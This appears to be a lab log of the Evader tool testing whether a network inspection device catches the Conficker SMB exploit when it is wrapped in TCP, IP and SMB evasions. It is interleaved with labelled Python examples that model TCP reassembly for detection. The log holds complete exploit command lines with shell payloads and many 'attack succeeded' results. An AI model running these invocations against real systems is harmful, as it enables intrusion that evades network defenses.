  419. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=20633 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=nYnMAcjCpmw --evasion=[smb_openpipe,msrpc_bind]smb_chaff,"1","write_flag","alphanum" --evasion=[smb_connect,smb_opentree]tcp_urgent,"8","random" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
  420. Info: Using random seed nYnMAcjCpmy
  421. The following evasions are applied from stage smb_connect to smb_opentree:
  422. - Add a random urgent data byte to every 8 TCP segment.
  423. The following evasions are applied from stage smb_connect to msrpc_bind:
  424. - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
  425. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  426. - Before every 1th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
  427.  
  428. Info: NetBIOS connection 10.62.90.116:20633 -> 10.35.1.207:445
  429. Terminated
  430. .........
  431. 518 runs averaging 1.27 runs / second ; progress: 408/43200......2015-11-29 14:32:41 INFO
  432. Success. (10.62.90.116):
  433. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55872 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=AI55OQEvx44 --evasion=[smb_connect,smb_opentree]tcp_paws,"1","10","shuffle" --evasion=[smb_opentree,msrpc_req]tcp_paws,"25%","10","zero" --verifydelay=1000 --payload=shell
  434. Info: Using random seed AI55OQEvx44
  435. The following evasions are applied from stage smb_connect to smb_opentree:
  436. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has shuffled original payload
  437. The following evasions are applied from stage smb_opentree to msrpc_req:
  438. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has 0x00 bytes as payload
  439.  
  440.  
  441. Info: NetBIOS connection 10.62.90.118:43937 -> 10.35.1.207:445
  442. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  443. Info: Sending MSRPC request with exploit
  444. Info: Shell found, attack succeeded
  445. Info: CommandShell::SendCommand() - Failed to send string
  446. Info: Command shell connection reset.
  447. Info: Shell closed
  448. 0: Success.
  449. ...........
  450. 27056 runs averaging 1.75 runs / second ; progress: 15463/43200.....2015-11-29 18:43:38 INFO
  451. Success. (10.62.90.118):
  452. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37311 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=wyvgfRwwEMY --evasion=[smb_openpipe,msrpc_req]smb_writeandxpad,"696","zero" --evasion=[smb_connect,end]tcp_paws,"5","268435454","random" --verifydelay=1000 --payload=shell
  453. Info: Using random seed wyvgfRwwEMb
  454. The following evasions are applied from stage smb_connect to end:
  455. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random bytes as payload
  456. The following evasions are applied from stage smb_openpipe to msrpc_req:
  457. - 696 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
  458.  
  459. Info: NetBIOS connection 10.62.90.118:37311 -> 10.35.1.207:445
  460. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  461. Info: Sending MSRPC request with exploit
  462. Info: Shell found, attack succeeded
  463. Info: CommandShell::SendCommand() - Failed to send string
  464. Info: Command shell connection reset.
  465. Info: Shell closed
  466. 0: Success.
  467. .
  468. 27063 runs averaging 1.75 runs / second ; progress: 15468/43200.....
  469. 27068 runs averaging 1.75 runs / second ; progress: 15473/43200........Pid 30630 timed out - killed
  470. 2015-11-29 18:43:47 INFO
  471. Timed out (10.62.90.112):
  472. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11483 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=I2UFterCp8Q --evasion=[smb_opentree,end]smb_decoytrees,"5","4","1","random" --evasion=[smb_opentree,msrpc_req]tcp_chaff,"13","nullchksum|shorthdr|longhdr","random" --evasion=[netbios_connect,end]tcp_urgent,"8","zero" --verifydelay=1000 --payload=shell
  473. Info: Using random seed I2UFterCp8Q
  474. The following evasions are applied from stage netbios_connect to end:
  475. - Add a zero urgent data byte to every 8 TCP segment.
  476. The following evasions are applied from stage smb_opentree to msrpc_req:
  477. - With every 13 TCP packet a TCP chaff packet is sent. The chaff packet has:
  478. * NULL TCP checksum.
  479. * TCP header shorter than 20 bytes
  480. * TCP header longer than packet total size
  481. * Duplicate packet has random bytes as payload
  482. The following evasions are applied from stage smb_opentree to end:
  483. - Before normal SMB writes, 5 SMB trees are opened and 4 writes are performed to them. The write payload is 1 random bytes.
  484.  
  485. Info: NetBIOS connection 10.62.90.112:11483 -> 10.35.1.207:445
  486. Terminated
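The tcp_chaff and tcp_paws runs above are the clearest illustration of what the log is testing: the victim's TCP stack silently discards a segment with a bad checksum, a nonsensical header length, a sequence number outside the receive window, no control flags, or (once timestamps have been negotiated) a TCP timestamp older than the last one it accepted (PAWS, RFC 7323 section 5.3). An inline device that accepts any of those segments builds a different byte stream from the one the victim hands to SMB, and its signatures run over the wrong bytes. The following Python model is an editor's addition, not part of the Evader log or of the Evader tool: it feeds the same arrival sequence (chaff and the stale duplicate first, then the genuine segment at the same sequence number) to a naive reassembler and to one that validates like a host. The byte strings, ISN and timestamp values are constructed stand-ins, the model assumes in-order delivery, and it treats a second copy of an already-seen byte as a retransmission (first copy wins), which is why a naive inspector ends up with the chaff.

```python
"""Added example (editor's, not from the Evader log): a toy TCP stream inspector
showing why an inline device must validate segments the way the victim's stack
does.  Modelled evasions: tcp_chaff (bad checksum, bogus header length,
out-of-window sequence number, no control flags) and tcp_paws (a duplicate
segment with a stale TCP timestamp, discarded by a receiver that negotiated
timestamps; RFC 7323 section 5.3).  Byte strings are constructed stand-ins."""
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

MASK32 = 0xFFFFFFFF


def ts_older(a: int, b: int) -> bool:
    """True if 32-bit timestamp a precedes b (modular comparison, as PAWS does)."""
    return ((a - b) & MASK32) >= 0x80000000


@dataclass
class Segment:
    seq: int
    payload: bytes
    tsval: Optional[int] = None   # TCP timestamp option value, None if absent
    csum_ok: bool = True          # did the TCP checksum verify?
    data_offset: int = 20         # TCP header length in bytes
    total_len: int = 0            # header + payload on the wire (0 = derive)
    flags: int = 0x18             # PSH|ACK

    def __post_init__(self) -> None:
        if self.total_len == 0:
            self.total_len = self.data_offset + len(self.payload)


@dataclass
class Reassembler:
    """Keeps the first byte seen per sequence number (later copies count as
    retransmissions); with strict=True it validates like a host first."""
    isn: int
    strict: bool
    window: int = 65535
    ts_recent: Optional[int] = None
    buf: dict = field(default_factory=dict)
    dropped: list = field(default_factory=list)

    def _reject_reason(self, s: Segment) -> Optional[str]:
        if not s.csum_ok:
            return "bad checksum"
        if s.data_offset < 20 or s.data_offset > s.total_len:
            return "bad header length"
        if s.flags == 0:
            return "null flags"
        if s.tsval is not None and self.ts_recent is not None \
                and ts_older(s.tsval, self.ts_recent):
            return "PAWS: stale timestamp"
        rcv_nxt = self.isn + 1 + len(self.buf)   # toy model assumes in-order data
        if not rcv_nxt <= s.seq < rcv_nxt + self.window:
            return "out of window"
        return None

    def feed(self, s: Segment) -> None:
        if self.strict:
            reason = self._reject_reason(s)
            if reason:
                self.dropped.append((s.seq, reason))
                return
            if s.tsval is not None:
                self.ts_recent = s.tsval
        for i, b in enumerate(s.payload):
            self.buf.setdefault(s.seq + i, b)   # first copy of a byte wins

    def stream(self) -> bytes:
        return bytes(self.buf[k] for k in sorted(self.buf))


ISN, TS0 = 1000, 500_000
PRELUDE = b"[smb negotiate + session setup]"             # constructed
EXPLOIT = b"[smb write andx] MSRPC-REQUEST-WITH-EXPLOIT"  # constructed
SIGNATURE = b"MSRPC-REQUEST-WITH-EXPLOIT"


def evader_like_segments() -> List[Segment]:
    """Arrival order as an evader sends it: chaff and the stale duplicate first,
    then the genuine segment covering the same sequence numbers."""
    seq1 = ISN + 1
    seq2 = seq1 + len(PRELUDE)
    n = len(EXPLOIT)
    stale = (TS0 - 268435454) & MASK32   # "timestamp <normal - 268435454>" in the log
    return [
        Segment(seq1, PRELUDE, tsval=TS0),
        Segment(seq2, b"A" * n, tsval=TS0, csum_ok=False),                 # nullchksum
        Segment(seq2, b"B" * n, tsval=TS0, data_offset=60, total_len=40),  # longhdr
        Segment(seq2, b"\x00" * n, tsval=stale),                           # tcp_paws dup
        Segment(seq2 + 10_000_000, b"C" * 16, tsval=TS0),                  # outofwindow
        Segment(seq2, b"D" * n, tsval=TS0, flags=0),                       # nullflag
        Segment(seq2, EXPLOIT, tsval=TS0),                                 # real data
    ]


def inspect(strict: bool) -> Tuple[bytes, list]:
    r = Reassembler(isn=ISN, strict=strict)
    for s in evader_like_segments():
        r.feed(s)
    return r.stream(), r.dropped


def detects(strict: bool) -> bool:
    return SIGNATURE in inspect(strict)[0]


if __name__ == "__main__":
    for strict in (False, True):
        stream, dropped = inspect(strict)
        print(f"strict={strict}: found={SIGNATURE in stream} dropped={dropped}")
```

Running it prints that the naive inspector (strict=False) never sees the signature because the bad-checksum chaff claimed the sequence numbers first, while the validating one drops five segments, one of them for PAWS, and reconstructs exactly the prelude plus the exploit bytes. A real inspector additionally has to learn TS.Recent per direction from the handshake and honour the victim's actual window, which the toy model fixes at 65535.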
.2015-11-29 18:43:48 INFO
Success. (10.62.90.112):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55625 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=avb+WdU5Of4 --evasion=[start,end]tcp_paws,"1","268435454","random_alphanum" --evasion=[msrpc_bind,end]tcp_segvar,"16208","65535" --evasion=[netbios_connect,msrpc_req]tcp_urgent,"13","random_alpha" --verifydelay=1000 --payload=shell
Info: Using random seed avb+WdU5Of5
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alphanumeric bytes as payload
The following evasions are applied from stage netbios_connect to msrpc_req:
- Add a random alpha urgent data byte to every 13 TCP segment.
The following evasions are applied from stage msrpc_bind to end:
- TCP packets are segmented to contain between 16208 and 65535 bytes of payload.

Info: NetBIOS connection 10.62.90.112:55625 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
.
27080 runs averaging 1.75 runs / second ; progress: 15478/43200.........
27089 runs averaging 1.75 runs / second ; progress: 15483/43200..............
27103 runs averaging 1.75 runs / second ; progress: 15488/43200..........
27113 runs averaging 1.75 runs / second ; progress: 15494/43200.......
27120 runs averaging 1.75 runs / second ; progress: 15499/43200.....
27125 runs averaging 1.75 runs / second ; progress: 15504/43200..............
27139 runs averaging 1.75 runs / second ; progress: 15509/43200.............2015-11-29 18:44:23 INFO
Success. (10.62.90.112):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57484 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=7SAxpWZ4/YA --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","3","2","random_msrpcbind" --evasion=[smb_openpipe,end]tcp_overlap,"4","new","random_alpha" --verifydelay=1000 --payload=shell
Info: Using random seed 7SAxpWZ4/YD
The following evasions are applied from stage smb_opentree to msrpc_req:
- Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 2 bytes of MSRPC bind-like data.
The following evasions are applied from stage smb_openpipe to end:
- TCP segments are set to overlap by 4 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload

Info: NetBIOS connection 10.62.90.112:57484 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
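The tcp_overlap run just above is a reassembly-policy problem rather than a validation problem: both overlapping segments are perfectly valid TCP, and the only question is which copy of the overlapping bytes the receiver keeps. Evader sends the junk in the earlier segment and the correct bytes in the later one, and since the log reports a shell, the victim evidently kept the later copy; an inspector that favours the earlier copy reconstructs a different stream. The tcp_segvar runs (segments as small as 8 bytes) and the ipv4_frag runs (fragments as small as 72 bytes) make the related point that a pattern has to be matched over the reassembled stream, never per segment or per fragment. The Python below is an editor's addition, not part of the Evader log or tool: it cuts a constructed payload the way tcp_segvar and tcp_overlap do, reassembles it under both overlap policies and reports which view contains a constructed signature. The policy names "first" and "last" are this example's own; the payload and signature bytes are stand-ins.

```python
"""Added example (editor's, not from the Evader log): TCP reassembly with an
explicit overlap policy.  Models tcp_segvar (payload cut into tiny segments)
and tcp_overlap (consecutive segments overlap by a few bytes; the earlier copy
carries junk in the overlap, the later copy the correct bytes).  ipv4_frag is
the same problem one layer down.  Payload and signature are constructed."""
from typing import Dict, List, Tuple

JUNK = b"Q"   # stand-in for the "random alpha" bytes in the overlapping part
EXPLOIT = b"[smb write andx to \\PIPE\\browser] MSRPC-REQUEST-WITH-EXPLOIT [stage...]"
SIGNATURE = b"MSRPC-REQUEST-WITH-EXPLOIT"


def make_segments(data: bytes, size: int, overlap: int) -> List[Tuple[int, bytes]]:
    """Cut data into size-byte segments; each segment except the last is extended
    by up to `overlap` junk bytes that collide with the start of the next one."""
    segs = []
    for off in range(0, len(data), size):
        chunk = data[off:off + size]
        tail = min(overlap, len(data) - (off + size))
        if tail > 0:
            chunk += JUNK * tail
        segs.append((off, chunk))
    return segs


def reassemble(segs: List[Tuple[int, bytes]], policy: str) -> bytes:
    """policy 'first': the earliest byte seen for a sequence number wins;
    policy 'last': a later segment overwrites it.  Arrival order matters."""
    buf: Dict[int, int] = {}
    for seq, payload in segs:
        for i, b in enumerate(payload):
            if policy == "last" or seq + i not in buf:
                buf[seq + i] = b
    return bytes(buf[k] for k in sorted(buf))


def per_segment_hits(segs: List[Tuple[int, bytes]], sig: bytes) -> int:
    """What a matcher that never reassembles would see."""
    return sum(1 for _, payload in segs if sig in payload)


def run(size: int = 8, overlap: int = 4) -> dict:
    segs = make_segments(EXPLOIT, size, overlap)
    first, last = reassemble(segs, "first"), reassemble(segs, "last")
    return {
        "segments": len(segs),
        "per_segment_hits": per_segment_hits(segs, SIGNATURE),
        "favor_first_hit": SIGNATURE in first,
        "favor_last_hit": SIGNATURE in last,
        "favor_last_exact": last == EXPLOIT,
    }


if __name__ == "__main__":
    print(run())                       # tcp_segvar 8 bytes + tcp_overlap 4 bytes
    print(run(size=1460, overlap=0))   # plain stream, a single segment
    print(run(size=72, overlap=0))     # ipv4_frag-like slicing, no overlap
```

With the log's parameters (8-byte segments, 4-byte overlap) the per-segment matcher gets zero hits, the "first" policy yields a stream with junk every eight bytes and no hit, and only the "last" policy reproduces the payload byte for byte. The practical lesson is target-based reassembly: the inspector must apply the overlap policy of the host it protects, because whichever copy that host keeps is the one the exploit is written for.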
...
27156 runs averaging 1.75 runs / second ; progress: 15514/43200..........2015-11-29 18:44:26 INFO
Success. (10.62.90.117):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64704 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=/auJxU4Kc4s --evasion=[start,end]tcp_paws,"25%","3","random_alphanum" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"2","1","alpharandomized" --verifydelay=1000 --payload=shell
Info: Using random seed /auJxU4Kc4v
- 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alphanumeric bytes as payload
The following evasions are applied from stage smb_opentree to smb_openpipe:
- Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 1> and has original payload with alphabetic bytes randomized

Info: NetBIOS connection 10.62.90.117:64704 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
...................
27186 runs averaging 1.75 runs / second ; progress: 15519/43200.........................
27211 runs averaging 1.75 runs / second ; progress: 15524/43200........2015-11-29 18:44:37 INFO
Success. (10.62.90.115):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24056 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=6n+RdaEVnnA --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"1","4","2046","random" --evasion=[msrpc_bind,end]tcp_paws,"1","268435455","zero" --verifydelay=1000 --payload=shell
Info: Using random seed 6n+RdaEVnnD
The following evasions are applied from stage smb_openpipe to msrpc_req:
- Before normal SMB writes, 1 SMB trees are opened and 4 writes are performed to them. The write payload is 2046 random bytes.
The following evasions are applied from stage msrpc_bind to end:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has 0x00 bytes as payload

Info: NetBIOS connection 10.62.90.115:24056 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
........
27228 runs averaging 1.75 runs / second ; progress: 15529/43200..............
27242 runs averaging 1.75 runs / second ; progress: 15534/43200..........
27252 runs averaging 1.75 runs / second ; progress: 15539/43200.............2015-11-29 18:44:52 INFO
Success. (10.62.90.118):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26003 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=XAiIoFWwcfc --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"6","5","695","random_msrpcbind" --evasion=[start,end]tcp_initialseq,"4294967293" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","6","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed XAiIoFWwcfd
- Initial TCP sequence number is set to 0xffffffff - 4294967293
The following evasions are applied from stage smb_openpipe to msrpc_req:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has random alphanumeric bytes as payload
The following evasions are applied from stage msrpc_bind to msrpc_req:
- Before normal SMB writes, 6 SMB trees are opened and 5 writes are performed to them. The write payload is 695 bytes of MSRPC bind-like data.

Info: NetBIOS connection 10.62.90.118:26003 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
..........
27276 runs averaging 1.75 runs / second ; progress: 15544/43200...........
27287 runs averaging 1.75 runs / second ; progress: 15549/43200...Pid 31683 timed out - killed
2015-11-29 18:45:00 INFO
Timed out (10.62.90.119):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55926 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=aGAi08H15y0 --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"72" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed aGAi08H15y1
The following evasions are applied from stage smb_openpipe to msrpc_bind:
- IPv4 fragments with at most 72 bytes per fragment
- Add a random alphanumeric urgent data byte to every 1 TCP segment.

Info: NetBIOS connection 10.62.90.119:55926 -> 10.35.1.207:445
Terminated
..............
27305 runs averaging 1.76 runs / second ; progress: 15554/43200......2015-11-29 18:45:09 INFO
Success. (10.62.90.116):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30801 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=hx3QRcDiL+U --evasion=[msrpc_bind,msrpc_req]tcp_paws,"1","9","random_alphanum" --evasion=[netbios_connect,end]tcp_timewait,"3","random_alpha" --verifydelay=1000 --payload=shell
Info: Using random seed hx3QRcDiL+W
The following evasions are applied from stage netbios_connect to end:
- 3 decoy TCP connections are opened from the same TCP port as the exploit connection will use. Each connection will be 32-544 bytes long and has random alpha bytes as payload
The following evasions are applied from stage msrpc_bind to msrpc_req:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random alphanumeric bytes as payload

Info: NetBIOS connection 10.62.90.116:30801 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
..
27314 runs averaging 1.76 runs / second ; progress: 15559/43200.........2015-11-29 18:45:11 INFO
Success. (10.62.90.116):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49130 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=f/d/WoCn4s8 --evasion=[netbios_connect,msrpc_bind]tcp_chaff,"25%","nullflag|outofwindow|longhdr","alpharandomized" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"75%","5","random" --verifydelay=1000 --payload=shell
Info: Using random seed f/d/WoCn4s9
The following evasions are applied from stage netbios_connect to msrpc_bind:
- 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
* NULL TCP control flags.
* An out-of-window sequence number.
* TCP header longer than packet total size
* Duplicate packet has original payload with alphabetic bytes randomized
The following evasions are applied from stage smb_openpipe to msrpc_req:
- 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random bytes as payload

Info: NetBIOS connection 10.62.90.116:49130 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Command shell connection reset.
Info: CommandShell::SendCommand() - Failed to send string
Info: Shell closed
0: Success.
..................................
27358 runs averaging 1.76 runs / second ; progress: 15564/43200...............
27373 runs averaging 1.76 runs / second ; progress: 15569/43200...................
27392 runs averaging 1.76 runs / second ; progress: 15574/43200..............2015-11-29 18:45:29 INFO
Success. (10.62.90.119):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17524 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=DsBpCDc6WlQ --evasion=[start,end]ipv4_frag,"1472" --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","3","random" --verifydelay=1000 --payload=shell
Info: Using random seed DsBpCDc6WlQ
- IPv4 fragments with at most 1472 bytes per fragment
The following evasions are applied from stage smb_opentree to msrpc_req:
- Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random bytes as payload

Info: NetBIOS connection 10.62.90.119:17524 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
.
27408 runs averaging 1.76 runs / second ; progress: 15579/43200................2015-11-29 18:45:34 INFO
Success. (10.62.90.116):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41391 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=Ch09Osy0JA4 --evasion=[smb_opentree,msrpc_bind]tcp_chaff,"25%","chksum|outofwindow|longhdr","random_alphanum" --evasion=[start,end]tcp_paws,"21","14850612","alpharandomized" --evasion=[msrpc_bind,end]tcp_paws,"50%","30115434","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed Ch09Osy0JA4
- Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 14850612> and has original payload with alphabetic bytes randomized
The following evasions are applied from stage smb_opentree to msrpc_bind:
- 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
* Invalid TCP checksum.
* An out-of-window sequence number.
* TCP header longer than packet total size
* Duplicate packet has random alphanumeric bytes as payload
The following evasions are applied from stage msrpc_bind to end:
- 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 30115434> and has random alphanumeric bytes as payload

Info: NetBIOS connection 10.62.90.116:41391 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
.....
27430 runs averaging 1.76 runs / second ; progress: 15584/43200.................2015-11-29 18:45:39 INFO
Success. (10.62.90.119):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62870 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=hcPJC8sYLrg --evasion=[smb_opentree,end]netbios_chaff,"25%","http_get|msrpc_req|broken_length" --evasion=[netbios_connect,end]tcp_paws,"2","5","random_alpha" --verifydelay=1000 --payload=shell
Info: Using random seed hcPJC8sYLri
The following evasions are applied from stage netbios_connect to end:
- Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alpha bytes as payload
The following evasions are applied from stage smb_opentree to end:
- 25% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.

Info: NetBIOS connection 10.62.90.119:62870 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
..
27450 runs averaging 1.76 runs / second ; progress: 15589/43200.............
27463 runs averaging 1.76 runs / second ; progress: 15594/43200Pid 32419 timed out - killed
2015-11-29 18:45:48 INFO
Timed out (10.62.90.114):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24326 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=bPs+NuUP/pQ --evasion=[start,smb_opentree]ipv4_frag,"1472" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed bPs+NuUP/pR
The following evasions are applied from stage start to smb_opentree:
- IPv4 fragments with at most 1472 bytes per fragment
The following evasions are applied from stage smb_openpipe to msrpc_req:
- Add a random alphanumeric urgent data byte to every 1 TCP segment.

Info: NetBIOS connection 10.62.90.114:24326 -> 10.35.1.207:445
Terminated
.
27465 runs averaging 1.76 runs / second ; progress: 15599/43200.....
27470 runs averaging 1.76 runs / second ; progress: 15604/43200..............
27484 runs averaging 1.76 runs / second ; progress: 15609/43200....................
27504 runs averaging 1.76 runs / second ; progress: 15614/43200..................
27522 runs averaging 1.76 runs / second ; progress: 15619/43200....
27526 runs averaging 1.76 runs / second ; progress: 15624/43200..........
27536 runs averaging 1.76 runs / second ; progress: 15629/43200...............
27551 runs averaging 1.76 runs / second ; progress: 15634/43200........................
27575 runs averaging 1.76 runs / second ; progress: 15640/43200...........
27586 runs averaging 1.76 runs / second ; progress: 15645/43200............
27598 runs averaging 1.76 runs / second ; progress: 15650/43200.........
27607 runs averaging 1.76 runs / second ; progress: 15655/43200..2015-11-29 18:46:47 INFO
Success. (10.62.90.112):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59721 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=891bOi00Urw --evasion=[netbios_connect,smb_opentree]ipv4_frag,"80" --evasion=[smb_opentree,end]tcp_paws,"5","268435455","random_alpha" --verifydelay=1000 --payload=shell
Info: Using random seed 891bOi00Urz
The following evasions are applied from stage netbios_connect to smb_opentree:
- IPv4 fragments with at most 80 bytes per fragment
The following evasions are applied from stage smb_opentree to end:
